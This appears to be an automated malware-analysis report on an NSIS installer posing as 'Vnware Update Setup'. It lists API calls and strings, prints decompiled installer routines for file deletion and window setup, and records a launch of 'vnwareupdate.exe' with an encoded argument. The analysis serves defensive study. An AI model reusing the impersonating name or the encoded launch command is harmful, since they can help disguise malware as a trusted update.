Part of subcall function 004037CE: GetUserDefaultUILanguage.KERNELBASE(00000002,74B5FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\GZe6EcSTpO.exe" ,00000000), ref: 004037E8
Part of subcall function 004037CE: lstrlenA.KERNEL32("C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD,?,?,?,"C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD,00000000,C:\Users\user\Desktop,1033,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,00000002,74B5FA90), ref: 004038BE
Part of subcall function 004037CE: lstrcmpiA.KERNEL32(?,.exe,"C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD,?,?,?,"C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD,00000000,C:\Users\user\Desktop,1033,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000), ref: 004038D1
Part of subcall function 004037CE: GetFileAttributesA.KERNEL32("C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD), ref: 004038DC
Part of subcall function 004037CE: LoadImageA.USER32 ref: 00403925
Part of subcall function 004037CE: RegisterClassA.USER32 ref: 00403962

ExitProcess.KERNEL32(?,?,00000006,00000008,0000000A), ref: 00403526

Part of subcall function 004036F4: CloseHandle.KERNEL32(FFFFFFFF,0040352B,?,?,00000006,00000008,0000000A), ref: 004036FF

OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 0040352B
ExitProcess.KERNEL32 ref: 0040354C
GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403669
OpenProcessToken.ADVAPI32(00000000), ref: 00403670
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403688
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036A7
ExitWindowsEx.USER32(00000002,80040002), ref: 004036CB
ExitProcess.KERNEL32 ref: 004036EE

Part of subcall function 004056BC: MessageBoxIndirectA.USER32(0040A218), ref: 00405717

Strings

Vnware Update Setup, xrefs: 004032D4
C:\Users\user\AppData\Local\Temp\, xrefs: 0040340C, 00403411, 00403427, 00403433, 00403442, 0040344F, 0040345B, 00403463, 0040355C, 0040356D, 00403578, 00403584, 00403591, 004035A0, 0040364F
UXTHEME, xrefs: 0040325E, 00403263, 00403269
\Temp, xrefs: 0040342E
"C:\Users\user\Desktop\GZe6EcSTpO.exe" , xrefs: 004032E4, 004032EA, 004034A1
NSIS Error, xrefs: 004032CF
C:\Users\user\Desktop, xrefs: 004033FC, 004034FD, 004035A7, 004035B0
C:\Users\user\Desktop, xrefs: 00403508
SeShutdownPrivilege, xrefs: 00403682
", xrefs: 0040333F
C:\Users\user\Desktop\GZe6EcSTpO.exe, xrefs: 00403609
TMP, xrefs: 00403464
C:\Users\user\Desktop, xrefs: 0040357E, 00403583, 004035AF
Low, xrefs: 0040344A
1033, xrefs: 00403478
TEMP, xrefs: 0040345C
Error launching installer, xrefs: 004034E3
~nsu, xrefs: 00403557
.tmp, xrefs: 00403573

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$Exit$File$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDefaultDeleteDirectoryErrorImageIndirectInfoInitializeLanguageLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeUserValueVersionlstrcmpi
String ID: "$"C:\Users\user\Desktop\GZe6EcSTpO.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop$C:\Users\user\Desktop$C:\Users\user\Desktop\GZe6EcSTpO.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$Vnware Update Setup$\Temp$~nsu
API String ID: 2959975522-1202167902
Opcode ID: d6de8780646b69e4a7a5cf95459ebf7e5d99360b65e2127c277ca4a039c6d736
Instruction ID: 947ab88924f8c3b38e2aea5cfaab7316d1dfac26a51a196f62222c0ed64aafcd
Opcode Fuzzy Hash: d6de8780646b69e4a7a5cf95459ebf7e5d99360b65e2127c277ca4a039c6d736
Instruction Fuzzy Hash: EEC1D470604741AAD7216F759E89B2F3EACAF45706F44053FF581B61E2CB7C8A058B2E

Uniqueness

Uniqueness Score: -1.00%

Function 00405768, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E00405768(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405A26(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73);
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x42f4a8 =  *0x42f4a8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00405FA0(0x42b878, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E0040597F(_t73);
					} else {
						lstrcatA(0x42b878, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]); // executed
						_t40 = FindFirstFileA(0x42b878,  &_v336); // executed
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405963( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E00405FA0(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E00405720(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E004050C7(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x42f4a8 =  *0x42f4a8 + 1;
										} else {
											E004050C7(0xfffffff1, _t73);
											E00405D7F(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405768(__eflags, _t73, _a8); // executed
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336); // executed
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12); // executed
						goto L29;
					}
					__eflags =  *0x42b878 - 0x5c;
					if( *0x42b878 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E004062A3(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405938(_t73);
							_t40 = E00405720(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E004050C7(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E004050C7(0xfffffff1, _t73);
							return E00405D7F(_t72, _t73, 0);
						}
						L33:
						 *0x42f4a8 =  *0x42f4a8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x00405772
0x00405777
0x00405780
0x00405783
0x0040578b
0x0040578e
0x00405791
0x00405799
0x0040579b
0x0040579c
0x00000000
0x0040579c
0x004057a7
0x004057aa
0x004057aa
0x004057aa
0x004057ae
0x004057c1
0x004057c8
0x004057cd
0x004057d1
0x004057e1
0x004057d3
0x004057d9
0x004057d9
0x004057e6
0x004057e9
0x004057f4
0x004057fa
0x004057ff
0x0040580f
0x00405811
0x00405817
0x0040581a
0x0040581d
0x004058d5
0x004058d5
0x004058d9
0x004058db
0x004058db
0x004058db
0x004058db
0x00000000
0x00000000
0x00000000
0x00000000
0x00405823
0x00405823
0x0040582c
0x00405832
0x00405837
0x0040583a
0x0040583c
0x00405840
0x00405842
0x00405842
0x00405840
0x00405845
0x00405848
0x0040585b
0x0040585d
0x00405862
0x00405869
0x00405884
0x00405889
0x0040588b
0x004058af
0x0040588d
0x0040588d
0x00405890
0x004058a4
0x00405892
0x00405895
0x0040589d
0x0040589d
0x00405890
0x0040586b
0x00405871
0x00405873
0x00405879
0x00405879
0x00405873
0x00000000
0x00405869
0x0040584a
0x0040584d
0x0040584f
0x00000000
0x00000000
0x00405851
0x00405853
0x00000000
0x00000000
0x00405855
0x00405859
0x00000000
0x00000000
0x00000000
0x004058b4
0x004058be
0x004058c4
0x004058c4
0x004058cf
0x00000000
0x004058cf
0x004057eb
0x004057f2
0x00000000
0x00000000
0x00000000
0x004057b0
0x004057b0
0x004057b2
0x004058df
0x004058e1
0x004058e4
0x00405935
0x00405935
0x00405935
0x004058e6
0x004058e9
0x004058f4
0x004058f9
0x004058fb
0x00000000
0x00000000
0x004058fe
0x0040590a
0x0040590f
0x00405911
0x00000000
0x0040592c
0x00405913
0x00405916
0x00000000
0x00000000
0x0040591b
0x00000000
0x00405922
0x004058eb
0x004058eb
0x00000000
0x004058eb
0x004057b8
0x004057bb
0x00000000
0x00000000
0x00000000
0x004057bb

APIs

DeleteFileA.KERNEL32(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405791
lstrcatA.KERNEL32(0042B878,\*.*,0042B878,?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057D9
lstrcatA.KERNEL32(?,0040A014,?,0042B878,?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057FA
lstrlenA.KERNEL32(?,?,0040A014,?,0042B878,?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405800
FindFirstFileA.KERNELBASE(0042B878,?,?,?,0040A014,?,0042B878,?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405811
FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004058BE
FindClose.KERNELBASE(00000000), ref: 004058CF

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405775
"C:\Users\user\Desktop\GZe6EcSTpO.exe" , xrefs: 00405768
\*.*, xrefs: 004057D3

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\GZe6EcSTpO.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-4197398924
Opcode ID: 7d0321bbea332b11eab5265096710db47f1751311f20dd5048d5c1bc18613115
Instruction ID: 3130a24326b3cf8508e32ba03364d00ecd767046abd4d032e56f6a736b511150
Opcode Fuzzy Hash: 7d0321bbea332b11eab5265096710db47f1751311f20dd5048d5c1bc18613115
Instruction Fuzzy Hash: AD519131900A05EAEF217B618C85BAF7A78DF42314F14817FF841B61E2D73C4952EE69

Uniqueness

Uniqueness Score: -1.00%

Function 004062A3, Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004062A3(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c0c0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2); // executed
				return 0x42c0c0;
			}

0x004062ae
0x004062b7
0x00000000
0x004062c4
0x004062ba
0x00000000

APIs

FindFirstFileA.KERNELBASE(74B5FA90,0042C0C0,0042BC78,00405A69,0042BC78,0042BC78,00000000,0042BC78,0042BC78,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,00405788,?,74B5FA90,C:\Users\user\AppData\Local\Temp\), ref: 004062AE
FindClose.KERNELBASE(00000000), ref: 004062BA

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
Instruction ID: 1e2c953ed1559e2f686ededff4fae2b078191910b4ed7f61f032671a7c701700
Opcode Fuzzy Hash: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
Instruction Fuzzy Hash: ACD01236519020ABC21027787E0C84B7A589F053347118A7BF4A6F21E0C7348C6686DC

Uniqueness

Uniqueness Score: -1.00%

Function 004037CE, Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E004037CE(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				signed short _t67;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x42f414;
				_t17 = E00406338(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x42a870;
					"1033" = 0x30;
					 *0x436001 = 0x78;
					 *0x436002 = 0;
					E00405E87(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a870, 0);
					__eflags =  *0x42a870;
					if(__eflags == 0) {
						E00405E87(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M00408362, 0x42a870, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					_t67 =  *_t17(); // executed
					E00405EFE("1033", _t67 & 0x0000ffff);
				}
				E00403A93(_t71, _t84);
				_t80 = "C:\\Users\\hardz\\Desktop";
				 *0x42f4a0 =  *0x42f41c & 0x00000020;
				 *0x42f4bc = 0x10000;
				if(E00405A26(_t84, "C:\\Users\\hardz\\Desktop") != 0) {
					L16:
					if(E00405A26(_t92, _t80) == 0) {
						E00405FC2(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x42f400, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42ebe8 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403A93(_t71, __eflags);
							__eflags =  *0x42f4c0;
							if( *0x42f4c0 != 0) {
								_t28 = E00405199(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42ebcc; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a850, 5);
							_t34 = E004062CA("RichEd20");
							__eflags = _t34;
							if(_t34 == 0) {
								E004062CA("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x42eba0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42eba0);
								 *0x42ebc4 = _t81;
								RegisterClassA(0x42eba0);
							}
							_t36 =  *0x42ebe0; // 0x0
							_t39 = DialogBoxParamA( *0x42f400, _t36 + 0x00000069 & 0x0000ffff, 0, E00403B6B, 0);
							E0040371E(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x42f400;
						 *0x42eba4 = E00401000;
						 *0x42ebb0 =  *0x42f400;
						 *0x42ebb4 = _t25;
						 *0x42ebc4 = 0x40a1f4;
						if(RegisterClassA(0x42eba0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x42a850 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f400, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x42e3a0;
					E00405E87(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f458, 0x42e3a0, 0);
					_t57 =  *0x42e3a0; // 0x22
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x42e3a1;
						 *((char*)(E00405963(0x42e3a1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E00405FA0(_t80, E00405938(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E0040597F(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x004037d4
0x004037dd
0x004037e4
0x004037e6
0x004037fa
0x0040380c
0x00403813
0x0040381a
0x00403820
0x00403825
0x0040382b
0x0040383e
0x0040383e
0x00403849
0x004037e8
0x004037e8
0x004037f3
0x004037f3
0x0040384e
0x00403858
0x00403861
0x00403866
0x00403877
0x004038fe
0x00403906
0x0040390f
0x0040390f
0x00403925
0x0040392b
0x00403939
0x004039ba
0x004039c2
0x004039cc
0x004039d1
0x004039d7
0x00403a61
0x00403a66
0x00403a68
0x00403a84
0x00000000
0x00403a84
0x00403a6a
0x00403a70
0x00403a78
0x00403a78
0x00000000
0x00403a70
0x004039e5
0x004039f0
0x004039f5
0x004039f7
0x004039fe
0x004039fe
0x00403a09
0x00403a11
0x00403a13
0x00403a15
0x00403a1e
0x00403a21
0x00403a27
0x00403a27
0x00403a2d
0x00403a46
0x00403a57
0x00000000
0x00403a5c
0x004039c4
0x004039c6
0x00000000
0x0040393b
0x0040393b
0x00403947
0x00403951
0x00403957
0x0040395c
0x0040396b
0x00403a89
0x00403a89
0x00000000
0x00403a89
0x0040397a
0x004039b5
0x00000000
0x004039b5
0x0040387d
0x0040387d
0x00403880
0x00403882
0x00000000
0x00000000
0x0040388c
0x0040389c
0x004038a1
0x004038a8
0x00000000
0x00000000
0x004038ac
0x004038ae
0x004038bb
0x004038bb
0x004038c3
0x004038c9
0x004038f1
0x004038f9
0x00000000
0x004038db
0x004038dc
0x004038e5
0x004038eb
0x004038ec
0x00000000
0x004038ec
0x004038e7
0x004038e9
0x00000000
0x00000000
0x00000000
0x004038e9
0x004038c9

APIs

Part of subcall function 00406338: GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
Part of subcall function 00406338: GetProcAddress.KERNEL32(00000000,?), ref: 00406365

GetUserDefaultUILanguage.KERNELBASE(00000002,74B5FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\GZe6EcSTpO.exe" ,00000000), ref: 004037E8

Part of subcall function 00405EFE: wsprintfA.USER32 ref: 00405F0B

lstrcatA.KERNEL32(1033,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,00000002,74B5FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\GZe6EcSTpO.exe" ,00000000), ref: 00403849
lstrlenA.KERNEL32("C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD,?,?,?,"C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD,00000000,C:\Users\user\Desktop,1033,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,00000002,74B5FA90), ref: 004038BE
lstrcmpiA.KERNEL32(?,.exe,"C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD,?,?,?,"C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD,00000000,C:\Users\user\Desktop,1033,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000), ref: 004038D1
GetFileAttributesA.KERNEL32("C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD), ref: 004038DC
LoadImageA.USER32 ref: 00403925
RegisterClassA.USER32 ref: 00403962
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040397A
CreateWindowExA.USER32 ref: 004039AF
ShowWindow.USER32(00000005,00000000), ref: 004039E5
GetClassInfoA.USER32 ref: 00403A11
GetClassInfoA.USER32 ref: 00403A1E
RegisterClassA.USER32 ref: 00403A27
DialogBoxParamA.USER32 ref: 00403A46

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004037D3
RichEdit20A, xrefs: 00403A09, 00403A0F
"C:\Users\user\Desktop\GZe6EcSTpO.exe" , xrefs: 004037D2
_Nb, xrefs: 00403941, 004039A9
.exe, xrefs: 004038CB
C:\Users\user\Desktop, xrefs: 00403858, 00403860, 004038F8, 004038FE, 0040390E
RichEdit, xrefs: 00403A18
RichEd32, xrefs: 004039F9
RichEd20, xrefs: 004039EB
"C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD, xrefs: 0040388C, 00403894, 004038A1, 004038EB, 004038F1
1033, xrefs: 004037EE, 00403844
Control Panel\Desktop\ResourceLocale, xrefs: 00403802
.DEFAULT\Control Panel\International, xrefs: 00403834

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
